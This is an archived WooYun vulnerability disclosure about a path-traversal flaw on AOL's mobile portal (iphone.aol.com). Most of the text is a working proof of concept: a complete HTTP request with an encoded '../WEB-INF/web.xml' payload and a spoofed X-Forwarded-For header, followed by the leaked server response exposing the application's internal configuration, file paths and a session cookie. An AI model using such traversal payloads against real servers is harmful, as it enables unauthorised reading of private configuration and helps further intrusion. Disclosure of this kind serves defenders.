乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-25: 细节已通知厂商并且等待厂商处理中 2015-03-30: 厂商已经主动忽略漏洞,细节向公众公开
mobile portal of aol --iphone.aol.comproof of concept:
GET /ajax.jsp?m=..%2f..%2fWEB-INF%2fweb.xml%3bx%3d&p=dynamicleadslide&vbclass=vid_over&ajax=1&sitHot=null&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config&dlItem=633100&dlug=false&cv=6&_c=main5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) Accept: text/html, */*; q=0.01Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Aolcom-Ajax: 1X-Requested-With: XMLHttpRequestCache-Control: no-cacheX-Forwarded-For: 127.0.0.1Host: iphone.aol.comAccept-Encoding: gzip, deflate
web.xml retrieved:
HTTP/1.1 200 OKDate: Wed, 22 Mar 2015 Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=iphone.aol.comSet-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.comPragma: no-cacheCache-Control: no-cache, no-store, private, max-age=0Expires: 0ModPagespeedDisableFilters: rewrite_javascript,inline_cssModPagespeed: onContent-Type: text/javascript;charset=UTF-8ntCoent-Length: 3506Set-Cookie: JSESSIONID=16DABAA250AA22B57E02F9BAE2D18EC7; Path=/aolContent-Length: 3506<?xml version="1.0" encoding="UTF-8"?><web-app id="WebApp_ID" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"> <display-name>portal5</display-name> <listener> <listener-class> com.aol.pubt.forc.util.ContextListener </listener-class> </listener> <listener> <listener-class> net.sourceforge.wurfl.core.web.WURFLServletContextListener </listener-class> </listener> <listener> <listener-class> com.aol.portals.core.ContextListener </listener-class> </listener> <context-param> <param-name>wurfl</param-name> <param-value>/data/servers/portal_fe_wurfl/wurfl.zip</param-value> </context-param> <context-param> <param-name>wurflPatch</param-name> <param-value>/data/servers/portal_fe_wurfl/wurfl_patch.xml</param-value> </context-param> <filter> <filter-name>VL6Filter</filter-name> <filter-class>com.aol.portals.core.utils.VL6Filter</filter-class> </filter> <filter-mapping> <filter-name>VL6Filter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>FORWARD</dispatcher> </filter-mapping> <filter> <filter-name>CMSFEPreviewFilter</filter-name> <filter-class>com.aol.pubt.dynapubcms.CMSFEPreviewFilter</filter-class> </filter> <filter-mapping> <filter-name>CMSFEPreviewFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter> <filter-name>DataLayerTracking</filter-name> <filter-class>com.aol.portals.aol.TrackingModuleDataFilter</filter-class> </filter>...................
危害等级:无影响厂商忽略
忽略时间:2015-03-30 19:52
暂无